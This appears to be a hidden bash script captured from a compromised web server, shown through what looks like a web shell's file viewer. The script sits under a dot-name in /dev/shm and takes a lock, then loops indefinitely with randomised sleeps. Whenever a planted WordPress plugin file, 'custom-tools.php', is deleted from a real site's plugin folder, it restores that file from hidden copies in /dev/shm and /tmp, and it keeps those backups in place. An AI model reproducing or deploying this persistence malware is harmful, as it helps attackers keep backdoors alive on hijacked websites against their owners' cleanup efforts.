????
| Current Path : /proc/thread-self/root/dev/shm/ |
| Current File : //proc/thread-self/root/dev/shm/.b73cb3ab |
#!/bin/bash
L='/dev/shm/.b73cb3ab.lock'
exec 200>"$L" && flock -n 200 || exit 0
B1='/dev/shm/.custom-tools.php'
B2='/tmp/.custom-tools.php'
SELF='/home/tranqirp/public_html/livinginspanglish/wp-content/plugins/custom-tools/custom-tools.php'
while :; do
sleep $((1500 + RANDOM % 600))
if [ ! -f "$SELF" ]; then
for b in "$B1" "$B2"; do [ -f "$b" ] && { cp "$b" "$SELF" 2>/dev/null; break; }; done
fi
[ -f "$B1" ] || cp "$SELF" "$B1" 2>/dev/null
[ -f "$B2" ] || cp "$SELF" "$B2" 2>/dev/null
done